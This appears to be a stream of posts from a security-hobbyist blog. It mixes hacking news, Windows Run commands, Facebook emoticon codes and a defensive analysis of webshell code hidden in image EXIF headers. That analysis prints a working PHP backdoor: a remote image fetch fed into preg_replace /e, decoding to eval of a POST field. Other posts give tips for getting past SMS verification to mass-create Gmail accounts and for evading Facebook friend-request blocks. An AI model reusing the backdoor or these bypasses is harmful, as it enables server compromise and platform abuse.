Hi Guys, Here we have some New smileys For Facebook Chat :-p

[[171108522930776]] Troll Face
[[164413893600463]] MEGUSTA
[[218595638164996]] YAO
[[189637151067601]] Lol
[[129627277060203]] Poker face.
[[227644903931785]] Forever ALONE.
[[100002752520227]] OKAY
[[105387672833401]] F**K YEA.
[[100002727365206]] CH AC.
[[125038607580286]] Forever alone navidad.
[[143220739082110]] FK KIDDING ME.
[[168040846586189]] Feel like a Sir.
[[169919399735055]] NOT BAD
[[142670085793927]] M O G.
[[170815706323196]] Cereal Guy
[[167359756658519]] NO
[[224812970902314]] Derp
[[192644604154319]] Derpina


Enjoy !!!!!!!!!!!!

Bypass Phone and SMS verification of Any Website

Brisk

Now a days, almost most websites need sms verification which includes google, facebook, youtube and other survey websites.
First of all we should understand why SMS and Phone Verification System is Important?

* Keep More Visitors for Market
* Providing Extra Security for their Website
* Keep Spammers out
* Daily Advertisement and promotional ads daily
 

Rather we can able to create and Bypass gmail (facebook, youtube, other shopping sites) without SMS verification. Because gmail allow to create only few account. When you try to create more account with same mobile number, google restricted and you can’t create more account. so we can create counterless gmail accounts using following steps.
This method is very useful to Bypass SMS verification and useful when you need to Sign up any account and do not feel comfortable to giving your real number or if you want to create multiple account.
Lets Start Step by Step:

1) First go to this Website : Receive-Sms Online
2) Copy any one number and paste it where they are asking SMS Verification.

3) Simply come back and click the number which you have selected, check it out there is your code sent by google, youtube or whatever else.

Useful run commands for windows 7

Like everyone said, time is gold. Every single second is precious and time is not to be wasted. Do you notice that sometimes we actually used up to 10 seconds to open a windows program? With today tip, you can probably open any programs in less than 5 seconds. So now I’m going to show you a list of general and common commands that you can use in the Run option from the start menu (Start > Run box). I consider this tip somewhat advanced, but if you get this into your head early on and spend more time familiarizing yourself, you can be a PRO in computing shortcuts!


This list is quite long and extensive. If you can’t memorize all these right away, you can always come back here and check out the commands you need when you wish to open certain windows programs. (Bookmark this page!)

Additional Advice: I strongly recommend you to use SlickRun. SlickRun is simply another “run option” that is much more simple to use.

SlickRun is a free floating command line utility for Windows. SlickRun gives you almost instant access to any program or website. SlickRun allows you to create command aliases (known as MagicWords), so C:\Program Files\Outlook Express\msimn.exe becomes MAIL.

Enter a web URL into SlickRun and it will launch your browser and navigate to the specified address. Run multiple programs in a few keystrokes, jot a note, look up a definition… SlickRun is the most natural way to interact with your computer.

Alright, here we go.

Windows logo key + R

Administrative Tools
Administrative Tools = control admintools
Authorization Manager = azman.msc
Component Services = dcomcnfg
Certificate Manager = certmgr.msc
Direct X Troubleshooter = dxdiag
Display Languages = lpksetup
ODBC Data Source Administrator = odbcad32
File Signature Verification Tool = sigverif
Group Policy Editor = gpedit.msc
Add Hardware Wizard = hdwwiz.cpl
iSCSI Initiator = iscsicpl
Iexpress Wizard = iexpress
Local Security Settings = secpol.msc
Microsoft Support Diagnostic Tool = msdt
Microsoft Management Console = mmc
Print management = printmanagement.msc
Printer User Interface = printui
Problems Steps Recorder = psr
People Near Me = p2phost
Registry Editor = regedit or regedt32
Resoure Monitor = resmon
System Configuration Utility = msconfig
Resultant Set of Policy = rsop.msc
SQL Server Client Configuration = cliconfg
Task Manager = taskmgr
Trusted Platform Module = tpm.msc
TPM Security Hardware = TpmInit
Windows Remote Assistance = msra
Windows Share Folder Creation Wizard = shrpubw
Windows Standalong Update Manager = wusa
Windows System Security Tool = syskey
Windows Script Host Settings = wscript
Windows Version = winver
Windows Firewall with Advanced Security = wf.msc
Windows Memory Diagnostic = MdSched
Windows Malicious Removal Tool = mrt

Computer Management
Computer Management = compmgmt.msc or CompMgmtLauncher
Task Scheduler = control schedtasks
Event Viewer = eventvwr.msc
Shared Folders/MMC = fsmgmt.msc
Local Users and Groups = lusrmgr.msc
Performance Monitor = perfmon.msc
Device Manager = devmgmt.msc
Disk Management = diskmgmt.msc
Services = services.msc
Windows Management Infrastructure = wmimgmt.msc

Conrtol Panel
Control Panel = control
Action Center= wscui.cpl
Autoplay = control.exe /name Microsoft.autoplay
Backup and Restore = sdclt
Create a System Repair disc = recdisc
BDE Administrator = bdeadmin.cpl
Color Management = colorcpl
Credential Manager = control.exe /name Microsoft.CredentialManager
Credential Manager Stored User Names and Passwords = credwiz
Date and Time Properties = timedate.cpl
Default Programs = control.exe /name Microsoft.DefaultPrograms
Set Program Access and Computer Defaults = control appwiz.cpl,,3 or ComputerDefaults
Devices and Printers = control printers
Devices and Printers Add a Device = DevicePairingWizard
Display = dpiscaling
Screen Resolution = desk.cpl
Display Color Calibration = dccw
Cleartype Text Tuner = cttune
Folders Options = control folders
Fonts = control fonts
Getting Started = GettingStarted
HomeGroup = control.exe /name Microsoft.HomeGroup
Indexing Options = control.exe /name Microsoft.IndexingOptions
Internet Properties = inetcpl.cpl
Keyboard = control keyboard
Location and Other Sensors = control.exe /name Microsoft.LocationandOtherSensors
Location Notifications = LocationNotifications
Mouse = control mouse or main.cpl
Network and Sharing Center = control.exe /name Microsoft.NetworkandSharingCenter
Network Connections = control netconnections or ncpa.cpl
Notification Area Icons = control.exe /name Microsoft.NotificationAreaIcons
Parental Controls = control.exe /name Microsoft.ParentalControls
Performance Information = control.exe /name Microsoft.PerformanceInformationandTools
Personalization = control desktop
Windows Color and Appearance = control color
Phone and Modem Options = telephon.cpl
Power Configuration = powercfg.cpl
Programs and Features = appwiz.cpl or control appwiz.cpl
Optional Features Manager = optionalfeatures or control appwiz.cpl,,2
Recovery = control.exe /name Microsoft.Recovery
Regional and Language = intl.cpl
RemoteApp = control.exe /name Microsoft.RemoteAppandDesktopConnections
Sound = mmsys.cpl
Volume Mixer = sndvol
System Properties = sysdm.cpl or Windows logo key + Pause/Break
SP ComputerName Tab = SystemPropertiesComputerName
SP Hardware Tab = SystemPropertiesHardware
SP Advanced Tab = SystemPropertiesAdvanced
SP Performance = SystemPropertiesPerformance
SP Data Execution Prevention = SystemPropertiesDataExecutionPrevention
SP Protection Tab = SystemPropertiesProtection
SP Remote Tab = SystemPropertiesRemote
Windows Activation = slui
Windows Activation Phone Numbers = slui 4
Taskbar and Start Menu = control.exe /name Microsoft.TaskbarandStartMenu
Troubleshooting = control.exe /name Microsoft.Troubleshooting
User Accounts = control.exe /name Microsoft.UserAccounts
User Account Control Settings = UserAccountControlSettings
User Accounts Windows 2000/domain version = netplwiz or control userpasswords2
Encryption File System = rekeywiz
Windows Anytime Upgrade = WindowsAnytimeUpgradeui
Windows Anytime Upgrade Results = WindowsAnytimeUpgradeResults
Windows CardSpace = control.exe /name Microsoft.cardspace
Windows Firewall = firewall.cpl
WindowsSideshow = control.exe /name Microsoft.WindowsSideshow
Windows Update App Manager = wuapp

Accessories
Calculator = calc
Command Prompt = cmd
Connect to a Network Projector = NetProj
Presentation Settings = PresentationSettings
Connect to a Projector = displayswitch or Windows logo key + P
Notepad = notepad
Microsoft Paint = mspaint.exe
Remote Desktop Connection = mstsc
Run = Windows logo key + R
Snipping Tool = snippingtool
Sound Recorder = soundrecorder
Sticky Note = StikyNot
Sync Center = mobsync
Windows Mobility Center (Only on Laptops) = mblctr or Windows logo key + X
Windows Explorer = explorer or Windows logo key + E
Wordpad = write
Ease of Access Center = utilman or Windows logo key + U
Magnifier = magnify
Narrator = Narrator
On Screen Keyboard = osk
Private Character Editor = eudcedit
Character Map = charmap
Ditilizer Calibration Tool = tabcal
Disk Cleanup Utility = cleanmgr
Defragment User Interface = dfrgui
Internet Explorer = iexplore
Rating System = ticrf
Internet Explorer (No Add-ons) = iexplore -extoff
Internet Explorer (No Home) = iexplore about:blank
Phone Dialer = dialer
Printer Migration = PrintBrmUi
System Information = msinfo32
System Restore = rstrui
Windows Easy Transfer = migwiz
Windows Media Player = wmplayer
Windows Media Player DVD Player = dvdplay
Windows Fax and Scan Cover Page Editor = fxscover
Windows Fax and Scan = wfs
Windows Image Acquisition = wiaacmgr
Windows PowerShell ISE = powershell_ise
Windows PowerShell = powershell
XPS Viewer = xpsrchvw

Open Documents folder = documents
Open Pictures folder = pictures
Open Music folder = music
Open Videos folder = videos
Open Downloads folder = downloads
Open Favorites folder = favorites
Open Recent folder = recent
Logs out of Windows = logoff
Locks User Account = Windows logo Key + L


Use shortcuts and have fun :)

How to send friend request when you get blocked - Best way

Facebook is a great social networking website through which we can stay connected with friends, relatives and other people. But Facebook does not allow to add strangers as your friends. You might have gone through a stage at least once in your Facebook account when a message appears i.e. your friend request is blocked for 1 day, 3 days, or even 30 days. You can not send friend request on Facebook to anyone whether you know him or not when you are blocked. This is because Facebook doesn’t let to send friend request to unknown people and considers it as spam and therefore temporarily disable sending friend requests when you violate its rules. This is generally done to secure privacy of people and some people by adding strangers as their friend make misuse of that thing.

However, sometimes you may even get blocked when you send friend request to known people but there are a lot of friend requesting awaiting approval pending already. I have also gone from this same stage, and feel helpless that we can’t send friend request to dear friends. So today i will tell you an easy trick with which you can send friend request even if you are blocked.

Ok lets start
1 open this link -https://www.facebook.com/?sk=ff
2. then click on other tools

 If you don’t know the easiest way to make contact file then follow these steps.

    Open new text document (.txt) in notepad.
    Add all the email addresses separated by a comma ( , ).
    Now save that file with the extension .vcf
    Now this is your contact file.
    Now Upload this file to Facebook. and you will be prompted to send friend request.

 Click “OK”and You’re done
Simple yet effective! Your friend request would be sent to desired people.

Twitter account of Malindo Air hacked

Malindo Air, an airline based in Malaysia, has lost control of their tweets after hackers hijacked their twitter account. Hacker managed to tweet a false message saying "Dear all, in view of the recent events, Malindo Air is giving away 100,000 free seats from today till end of the week." When a Malaysian politician Tony Pua retweeted and asking whether "Hacked or real?".  The hackers responded with "damn real, yb".

However, Malindo Air representative told local news report that they are not giving 100,000 free seats and apologized for the inconvenience. "Dear All, our twitter account has been hacked. Please do not entertain the hacker. We will get to the bottom of this problem. Thank you." It appears they have not yet recovered the account, the tweet posted by the hacker still appears even after 20 hours.

US denies Barack Obama knew of Angela Merkel surveillance

Washington, Oct 28: The US has dismissed reports that President Barack Obama was informed about the tapping of Angela Merkel's mobile phone, even as an American daily on Monday said that spying of as many as 35 world leaders, including the German Chancellor, ended when it was brought to his notice.

The National Security Agency has refuted that it ever discussed such spying programmes, in particular those of Merkel, with Obama. "(NSA Director) Gen (Keith) Alexander did not discuss with President Obama in 2010 an alleged foreign intelligence operation involving German Chancellor Merkel, nor has he ever discussed alleged operations involving Chancellor Merkel.

News reports claiming otherwise are not true," NSA spokesperson Vanee' Vines, said in a statement. The denial came after a report by Bild am Sonntag newspaper said Obama was informed about the NSA's tapping of Merkel's mobile phone already in 2010 by its director. The President "not only did not stop the operation, but he also ordered it to continue," a high-ranking NSA official was quoted as saying by the paper.

The NSA has refuted that it ever discussed such spying programmes. 

 A media report also said that the Merkel's surveillance may have begun as early as 2002. Meanwhile, The Wall Street Journal today reported that Obama was unaware that his own NSA monitored the cell phone communication of as many as 35 world leaders including those of France and Germany.

The spying programme ended this summer when it was first brought to his notice, the report said. The reports of such spying programmes, derived from documents acquired from former CIA contractor Edward Snowden, have outraged a number of European leaders in particular those of France and Germany and has badly damaged the US relationship with these countries.

The report, quoting unnamed US officials, said the White House cut off some monitoring programmes after learning of them, including the one tracking Merkel and some other world leaders. Other programmes have been slated for termination but have not been phased out completely yet, officials said.

Live Hacking & Information Security free seminar @ Nungampakkam, Chennai Sunday, October 27, 2013 from 4:00 PM to 6:00 PM (IST) CHENNAI,

Hi Folks,

Brisk Info Sec Proudly presents 

FREE Ethical Hacking & Information Security boot camp on 27/10/2013 Sunday at 04:00pm to 06:00pm,

http://briskinfosecurity.eventbrite.com/

Hurry !!! Only Limited Seats are available !!!

Phone  :09962208446

Email : info@briskinfosec.com, briskinfosec@gmail.com

Website: www.briskinfosec.com

Venue:
150 FIRST FLOOR
OFFICE NUMBER 1- DHARMA TOWERS
NELSON MANILKKAM ROAD,CHOOLAI MEDU
CHENNAI-600094

Make a Note:

1) Be On-time.

2) Take a printout of Free pass.

3) Its absolutely free and there are no hidden charges.

4) Demos and explanations are fully based on practical and its only for educational purpose.

5) Attendees are responsible if they harm other peoples in, direct or indirect by BriskInfoSec seminar. 

6) Only Registered candidates are eligible to attend our seminar.

7) This seminar will teach you about demand of Information security professionals and guide the same.

8) We are specially inviting working professionals(Developers, Testers, System admins,  Network admins, College students, CISSP Preparation, CEH Preparation, Security audit people).

9) Share this post on your social networking site (Facebook, Linkedin, Google+) to make awareness as a hacker.  

Hiding Webshell Backdoor Code in Image Files

First appearances may be deceiving...  Web attackers have have been using a method of stashing pieces of their PHP backdoor exploit code within the meta-data headers of these image files to evade detections.  This is not a completely new tactic however it is not as well known by the defensive community so we want to raise awareness.  Let's first take a quick look at why this technique is being utlized by attackers.

Standard Webshell Backdoor Code

There are many methods attackers employ to upload Webshell backdoor code onto compromised web servers including Remote File Inclusion (RFI), Wordpress TimThumb Plugin and even non-web attack vectors such as Stolen FTP Credentials.  Here is a graphic taken from this years Trustwave SpiderLabs Global Security Report that lists the top malicious file types uploaded to compromised web servers:

Let's take a look at a standard obfuscated R57 shell example:


Notice the Base64 encoded parameter data and then the PHP Eval call at the end.  Once PHP executes this code, it will decode and inflate the data stream and the result will be a basic file uploader webshell similar to the following:

Incident Response Steps - Identification and Eradication  

These types of attacks and compromises are so prevalent in Shared Hosting environments where end users do not properly update their web application software.  In response to these types of scenarios, Hosting Provider security teams often employ OS-level back-end processes that scan the local file systems looking for tell-tale signs of webshell backdoor code.  One example tool is called MalDetect.  This script can be run to analyze files and detect various forms of malicious code.  If we run maldetect against our example R57 webshell file we get the following:

$ sudo /usr/local/maldetect/maldet --config-option quar_hits=0,quar_clean=0,clamav_scan=1 -a "/tmp/lin.php"
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(92294): {scan} signatures loaded: 9011 (7145 MD5 / 1866 HEX)
maldet(92294): {scan} building file list for /tmp/lin.php, this might take awhile...
maldet(92294): {scan} file list completed, found 1 files...
maldet(92294): {scan} 1/1 files scanned: 0 hits 0 cleaned
maldet(92294): {scan} scan completed on /tmp/lin.php: files 1, malware hits 1, cleaned hits 0
maldet(92294): {scan} scan report saved, to view run: maldet --report 101113-1250.92294
maldet(92294): {scan} quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294
$ sudo maldet --report 101113-1250.92294
malware detect scan report for MacBook-Pro-2.local:
SCAN ID: 101113-1250.92294
TIME: Oct 11 12:50:48 -0400
PATH: /tmp/lin.php
TOTAL FILES: 1
TOTAL HITS: 1
TOTAL CLEANED: 0

NOTE: quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294
FILE HIT LIST:
{MD5}base64.inject.unclassed.1 : /tmp/lin.php
===============================================
Linux Malware Detect v1.4.2 < proj@rfxn.com >

 As you can see, maldetect identified this PHP file with of of its generic base64 injection signatures.  While this indivudual file scanning does work, for managability, most organizations opt to run maldetect as part of an ogoing automated process run through scheduling tools such as Cron.  The big problem with this process is that, for performance reasons, many organizations opt to only scan PHP files and exclude other file types from being scanned...

Hiding Webshell Backdoor Code in Image Files 

 This brings us back to the beginning of the blog post.  Due to the cleanup tactics used by most organizations, the bad guys had to figure out a method of hiding their backdoor code in places that most likely would not be inspected.  In this case, we are talking about hiding PHP code data within the Exif image header fields.  The concept of Stegonography is not new and there have been many past examples of its use for passing data, however we are now seeing it used for automated code execution.  I do want to give a proper hat-tip to the Sucuri Research Team who also found similar techniques being employed.

PHP Code In EXIF Headers

If you were to view-source in a browser or use something like the unix strings command, you could see the new code added to the top of the image files:


After uploading this file to VirusTotal, you can see a more friendly representation of the EXIF fields:

As you can see, the PHP code is held within the EXIF "Model" and "Make" fields.  This data does not in any way interfere with the proper rendering of the image file itself.

PHP's exif_read_data function

PHP has a function called exif_read_data which allows it to read the header data of image files.  It is used extensivly in many different plugins and tools.  Here is an example from Facebook's GitHub Repo:

Updated PHP Webshell Code

So, with pieces of their webshell stashes away within the EXIF headers of either local or remote image files, the attackers can then modify their PHP code to leverage the PHP exif_read_data function like this:

<?php
$exif = exif_read_data('http://REDACTED/images/stories/Logo_Coveright.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
?>

The first line downloads a remote jpg image file with the stashes code in it and then sets the $exif variable with the array value.  We can modify this PHP code to simulate this by downloading the same files and then dumping the $exif data:

<?
$exif = exif_read_data('http://REDACTED/images/stories/Logo_Coveright.jpg');
var_dump($exif);
?>

When executing this php file, we get the following output:

$ php ./exif_dumper.php
array(9) {
  ["FileName"]=>
  string(18) "Logo_Coveright.jpg"
  ["FileDateTime"]=>
  int(0)
  ["FileSize"]=>
  int(6159)
  ["FileType"]=>
  int(2)
  ["MimeType"]=>
  string(10) "image/jpeg"
  ["SectionsFound"]=>
  string(13) "ANY_TAG, IFD0"
  ["COMPUTED"]=>
  array(5) {
    ["html"]=>
    string(23) "width="155" height="77""
    ["Height"]=>
    int(77)
    ["Width"]=>
    int(155)
    ["IsColor"]=>
    int(1)
    ["ByteOrderMotorola"]=>
    int(0)
  }
  ["Make"]=>
  string(5) "/.*/e"
  ["Model"]=>
  string(108) "eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));"
}

The final setup in this process is to execute the PHP preg_replace function.

<?php
$exif = exif_read_data('http://REDACTED/images/stories/Logo_Coveright.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
?>

Notice that the $exif['Make'] variable data uses the "/.*/e" PCRE regex modifier (PREG_REPLACE_EVAL) which will evaluate the data from the $exif['Model'] variable.  In this case, it would execute the base64_decode which results in the following PHP snippet of code:

if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

This code checks to see if there is a POST request body named "zz1" and if there is, it will then eval the contents.  This makes it quite easy for attackers to sprinkle backdoor access code by injecting other legitimate PHP files with this combination of exif_read_data and preg_replace code.

How Widespread?

We can not accurately estimate how widespread this technique is being used however there is a small amount of empirical evidence by simply using public search engines to flag any web pages that list characteristics of either EXIF code hiding or searching for this specific base64 encoded string value.

There are hundreds of examples of this base64 encoded data being present within image files.

Recommendations

Scan All Files for Malicious Code

If you are running OS level scanning of files on disk, carefully consider which file-types you want to include/exclude.  As this scenario shows, attackers can take advantage of your excluded content to hide their code.

Scan Files During Attachment Uploading using ModSecurity

When end users are uploading images as file attachments, ModSecurity has the ability to:

1. Extract the file and dump it to a tmp file on disk
2. Execute the @inspectFile operator to analyze the file
3. Block uploading if malware is found

The maldetect README file even includes instructions on how to integrate it with ModSecurity:

.: 12 [ MODSECURITY2 UPLOAD SCANNING ]

The support for HTTP upload scanning is provided through mod_security2's inspectFile hook.
This feature allows for a validation script to be used in permitting or denying an upload. 

The convenience script to faciliate this is called modsec.sh and is located in the
/usr/local/maldetect installation path. The default setup is to run a standard maldet scan
with no clamav support, no cleaner rule executions and quarantining enabled; these options
are set in the interest of performance vs accuracy which is a fair tradeoff. 

The scan options can be modified in the modsec.sh file if so desired, the default
scan options are as follows:
--config-option quar_hits=1,quar_clean=0,clamav_scan=0 --modsec -a "$file"

There is a tangible performance difference in disabling clamav scanning in this usage
scenario. The native LMD scanner engine is much faster than the clamav scanner engine
in single file scans by a wide margin. A single file scan using clamav takes roughly
3sec on average while the LMD scanner engine takes 0.5sec or less.

To enable upload scanning with mod_security2 you must set enable the public_scan option
in conf.maldet (public_scan=1) then add the following rules to your mod_security2 
configuration. These rules are best placed in your modsec2.user.conf file on cpanel servers
or at the top of the appropraite rules file for your setup.

/usr/local/apache/conf/modsec2.user.conf (or similar mod_security2 rules file):
SecRequestBodyAccess On
SecRule FILES_TMPNAMES "@inspectFile /usr/local/maldetect/modsec.sh" \
                "log,auditlog,deny,severity:2,phase:2,t:none"

A restart of the HTTPd service is required following these changes.

When an upload takes place that is determined to be malware, it will be rejected and an
entry will appear in the mod_security2 SecAuditLog file. On cpanel servers and most
configurations this is the modsec_audit.log located under /usr/local/apache/logs or 
/var/log/httpd.

The log entry will appear similar to the following:

Message: Access denied with code 406 (phase 2). File "/tmp/20111120-....-file" rejected by
the approver script "/usr/local/maldetect/modsec.sh": 0 maldet: {HEX}php.cmdshell.r57.317
/tmp/20111120-....-file [file "/usr/local/apache/conf/modsec2.user.conf"] [line "3"]
[severity "CRITICAL"]

Teenager hacked Web sites globally

New Taipei City (新北市) police on Tuesday arrested a 16-year-old high-school student who allegedly hacked more than 1,237 Web sites across the globe and was ranked 19th in the world on the Global Hack Website Statistics site.
According to the police department’s criminal investigation division, the teenager, surnamed Hsu (許), who uses the online name “XerL9meI,” began hacking Web sites in July this year and had hacked into the Web sites of Kinmen County’s education bureau, National Central University, Tamkang University and private corporations, as well as government agencies in China and India.
Hsu was quoted by police as saying that he learned how to hack Web sites by reading books and buying certain computer programs, and he thought his IP address could not be traced. The police said they were able to trace him to his IP address through messages he left on the Web sites he had hacked.
According to police, Hsu looked for loopholes in Web sites’ SQL coding language and used them to bypass firewalls and obtain administrator privileges by cracking the passwords. He then uploaded his trademark message, which read: “You got hacked by XerLme9,” along with a warning that the Web site was unsafe.
While Hsu was quoted by police as admitting to hacking the Web sites, which would be a violation of Article 358 of the Criminal Code if prosecutors decided to press charges — punishable by three years in prison, detention or more than NT$100,000 (US$3,400) in fines — he said he was only a “gray hat hacker” who wished to remind the corporations he had hacked that their Web sites’ information security had loopholes.
Head of the criminal investigation division Lu Yue-cheng (呂岳城) said that though Hsu’s actions — having hacked the national land resources Web site of the Ruzhou city government in China’s Henan Province — could be considered an anti-United Front (統戰) act, it was nonetheless illegal.
The police had released Hsu into the custody of his grandparents, who are his legal guardians because Hsu’s parents had separated when he was very young and his father is in a vegetative state after a car accident last year.
Hsu’s grandparents said Hsu did not do well in school and often cloistered himself in his room, adding that they did not really know what he was up to.
“We would like to thank the police for nipping the flower in the bud, so to speak,” they said, adding that they would keep an eye on Hsu and try not to let him sink any deeper into the world of hacking.
As the arrest had been the second of a teenaged hacker in Taiwan, after the arrest of a 14-year-old youth in Taoyuan County last year, the New Taipei City police department’s criminal investigation division expressed concern about the trend of ever-younger hackers being apprehended.
The youths might glorify other hackers, or may simply want to prove themselves or have something to brag about, the police department said, adding that in the information age, access to hacking-related books and computer programs was too easy.
“We fear that more juvenile hackers would start to try their hand at hacking in the future,” police officers said, issuing a call for governmental and private organizations to reinforce their Web sites’ information security.
Police said that if members of the public’s personal data were extracted by hackers from organizations’ data banks, the organizations would be held complicit for violating the Personal Information Protection Act (個人資料保護法).

Think China is the No. 1 Country for Hacking? Think Again.

China has earned a reputation as the hacker capital of the world, but a new report shows the bulk of global cyber-attack activity has recently come from its smaller neighbor Indonesia.
Thirty-eight percent of cyber attacks originated in Indonesia during the second quarter of 2013, up from 21 percent in the first quarter, according to a report by security cloud platform Akamai. This spike helped push China off the hacking pedestal, with the world's most populous country accounting for 33 percent of attacks, down from 34 percent in the previous quarter. The U.S. rounded out the top three, generating 6.9 percent of cyber-attack traffic, a decrease from 8.3 percent.
Indonesia and China alone accounted for more than half of all cyber-attack activity during the quarter.
Related: Don't Get Hacked -- Tools to Fight Cyber Attacks
While it may seem like Indonesia came out of nowhere to take the lead (last year the country accounted for on average less than one percent of cyber crimes), hackers may be taking advantage of its increase in connection and weakening IT structure.
The country's average internet connection speed increased 125 percent in the second quarter from the same time last year. That, coupled with the fact the country isn't spending a whole lot of cash on its infrastructure,  may make the country a haven for cybercriminals.
Related: Cyber Security a Growing Issue for Small Business 
In January, hacker group Anonymous Indonesia claimed responsibility for defacing 12 government websites with the tagline "No Army Can Stop an Idea" shown on the sites. In April, the country's defense minister Purnomo Yusgiantoro announced they were building a Cyber Defense Center to take on hackers. Microsoft also felt the supposed wrath of Indonesia criminals (among others) when it put the kibosh on a cybercrime operation in June.
Akamai's findings are based on agents reporting log connection attempts, which the company defines as attack traffic. The company then can determine the top countries the hack attacks occur. One caveat to keep in mind: the IP address assigned to a particular country may not be the nation the attacker resides. So someone from China with an IP address associated with them, may be committing cyber attacks in France.
To check out more of Akamai's findings, check out the below highlights:

Click to Enlarge+

Hacking Facebook ads using Google+ Circles : Target your Audiance

                Too often, marketers get caught in the social network wars that users do, neglecting that while a certain social network may not be their favorite to use, there is definitely a marketing advantage to using it.It’s way too easy to focus on Facebook, and forget that Google+ and Twitter are out there with hundreds of millions of users waiting to hear about your product. As a result, I really try to avoid these biases to ensure I’m taking the best that each network has to offer in my marketing campaigns.It was with this approach that I discovered a way just yesterday to utilize your Google+ circles to better target your ad campaigns on Facebook, and it’s pretty simple. It involves Google+, Google Contacts, and Custom Audiences within Facebook Power Editor.

Here’s how it works:

Create and Add Google+ Users to Circles

The first step is to identify different segments of users on Google+ you could be targeting. Recently, I spoke at Social Media Examiner’s Social Media Success Summit conference and asked them all to share their experiences on Google+ using the hashtag, #SMSS13.
This did 2 things: it got the term to trend (it’s much easier to trend on Google+ than Twitter), and it gave me a way to identify all the Google+ users that were participating in my talk.

From this group of users, we created a shared circle that we also shared with others participating in the conversation so that others could identify who was missing. This now gave me a list I could use on Google+, but guess what? I could also use it through Google Contacts.

Use Google Contacts to Obtain Email Addresses

One of my favorite features of Google+ is its integration with all other Google Products. One of the most powerful of those integrations is Google Contacts. For every circle you create on Google+, it also gives you access to those users’ information in Google Contacts as well.
This means if they’ve made their email address accessible to the people that have circled them, or to the public, their email address will appear in Google Contacts. Now you have an instant email list!

The problem I’ve found with Google Contacts is that for some reason you can’t export the email addresses through their export feature, but you can email everyone in a particular circle. So what I do is select the circle on the left, check all the names in the circle, and then click the little email icon at the top.
This puts all of the names and email addresses in the “To” field in a Gmail compose box. Now all I have to do is copy all those into a text file (on Windows I just use Notepad for this and save as text) and import them into Excel.

Format the Excel File

For this exercise you really only need the email addresses, but you need them each in a separate row. Copying and pasting the names and emails into a text file puts them all on the same line including weird characters and text. What I do is I import the file as csv, and this puts each name and email in a separate column.
Then, if you select all of them in Excel, copy (cut does not work), and then highlight the row below, right click and select “paste special” you can select “transpose” to put them all in a single column.

Now, with a little bit of row-splitting magic (you can Google this, splitting on the “>”), and some find and replace on the miscellaneous “>” and “<” and other characters you see you can get rid of the names column and have a single column full of pure email addresses. Just save this in .csv (comma-separated-value) format and you’re done. Now for the fun part!

Create a Custom Audience in Power Editor

Now you just need to import the file into Power Editor as a custom audience you can now target for future ad campaigns. To do this, go to “Audiences” on the left in Power Editor, select “Create Audience” in the drop-down at the top, and then “Custom Audience”.

Here you can name your audience, and upload the csv file you just created. Facebook will match these emails with users in their database, and now you have a custom, micro-targeted audience you can start using in your ad campaigns! So if I have follow-up material I want to share with those I spoke to, I now get to have an ad waiting for them when they get back to Facebook.
Give it a try and let me know what you think!

Metasploit and Rapid7 DNS hijacked and Defaced by Kdms Team

The domains of Metasploit.com and its parent company rapid7.com had been hijacked and defaced by the Kdms Team.  They had previously also had taken down down several high profile computer security related targets.


Mr. HD Moore (Chief Research Officer of Rapid7 and Chief Architect of Metasploit) told EHN how the domain was hijacked. 

India needs more than 4 lakh hackers'

According to CERT-In, the national incident response centre, a government nodal agency, at least 42 million Indians were hit by cyber crimes and the recorded loss of the same was a staggering $8 billion loss in disaster in the past 12 months.

Mohan Gandhi, an Indian Institute of Management Ahmedabad graduate provides anti-piracy solutions through his company Entersoft Information Systems. In this interview with rediff.com's Vicky Nanjappa, Gandhi speaks about the challenges while dealing with cyber security and also what it is to be an ethical hacker.
How important is it for India to have ethical hackers?
Forty two million Indians were hit by cyber crimes in the last 12 months, with a total of $8 billion recorded in direct financial losses to the corporate world. India is the third-most affected nation due to hackers.
In terms of cyber attacking abilities and fortification standards of India is far below Israel, the United States and China. China filters and monitors almost every packet/piece of information.
Unfortunately, India has seen many government, and defense websites being hacked in the recent times. Our country has been traditionally defensive in terms of information security.
Have we identified the importance of ethical hackers?
Corporate India has now identified the importance of ethical hackers and almost every security company has them as a strategy to perform ethical covet activities. According to latest estimation by Cert-In, India is in need of more than 4 lakh ethical hackers.
The world has seen how important intellectual property in this century is. Firms such as Apple, Samsung and Microsoft of the world use patenting for competitive edge.

Whatsapp and AVG Antivirus Website defaced by Palestinian Hackers

The Website of Word's most popular mobile messaging app and Antivirus Firm - AVG were hacked this morning and defaced by a new Palestinian Hacker group - KDMS Team, affiliated with Anonymous Group.

The Defacement page titled 'You got Pwned', with Anonymous Logo and playing Palestinian national anthem in the page background, says: 

we want to tell you that there is a land called Palestine on the earth
this land has been stolen by Zionist
do you know it ?
Palestinian people has the right to live in peace
Deserve to liberate their land and release all prisoners from israeli jails
we want peace and "There Is No Full Security We Can Catch You !"

It seems that the hacker used DNS hijacking to point domains on a fake server with deface page. The Whatsapp has resolved the issue, but at the time of writing AVG is still defaced. It is not clear that if any user data was compromised from AVG or Whatsapp.

We have contacted WhatsApp and AVG for comment and will update this story when we hear back. Just two days before, KDMS Team hacked Lease Web, one of the world's biggest hosting company.

Update : Another Antivirus Firm 'AVIRA"website also defaced by hackers, just few minutes before.

Update: NETWORK SOLUTIONS, LLC is common Domain Register for AVG, Avira and Whatsapp . Possibly, hacker compromised the Domain Registrar and modifies the DNS settings to perform DNS Hijacking.

Philippines Navy website hacked by Pr3 H4ck3r

A Hacker with handle "Pr3 H4ck3r" from Philippine Cyber Army has claimed to have hacked into the database of the Navy website.

According to hacker's statement, he compromised the data by exploiting the SQL Injection vulnerability in the Navy's "BRP Alcaraz blog" page (navy.mil.ph/alcaraz).

However, we are not able to access the given link at the time of writing. It appears the admin has taken down the link.  The news was first reported by local hacking news site PinoyHackNews.

